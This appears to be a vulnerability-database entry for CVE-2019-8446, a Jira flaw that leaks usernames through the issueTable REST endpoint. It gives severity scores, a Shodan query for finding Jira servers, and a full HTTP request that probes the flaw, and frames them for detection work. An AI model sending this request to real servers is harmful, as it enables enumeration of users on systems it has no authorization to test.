🔙 목록으로 돌아가기

CVE-2019-8446: Jira Improper Authorization

TitleJira Improper Authorization
AuthordhiyaneshDk
SeverityMedium
ImpactThis vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Jira application.
RemediationApply the latest security patches and updates provided by Atlassian to fix the vulnerability.
CVSS Score5.3
EPSS Score0.72961
CVE IDCVE-2019-8446
CWE IDCWE-863
Shodan Queryhttp.component:"Atlassian Jira"http.component:"atlassian jira"
Tags cve cve2019 jira atlassian vkev vuln

🔍 Vulnerability Description

The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check.

🌐 HTTP Request

POST /rest/issueNav/1/issueTable HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Content-Length: 70
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: Close
X-Atlassian-Token: no-check

{'jql':'project in projectsLeadByUser("38FZYLrx0vjiBCCjFVj7S4ETY82")'}

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-8446.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-8446.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A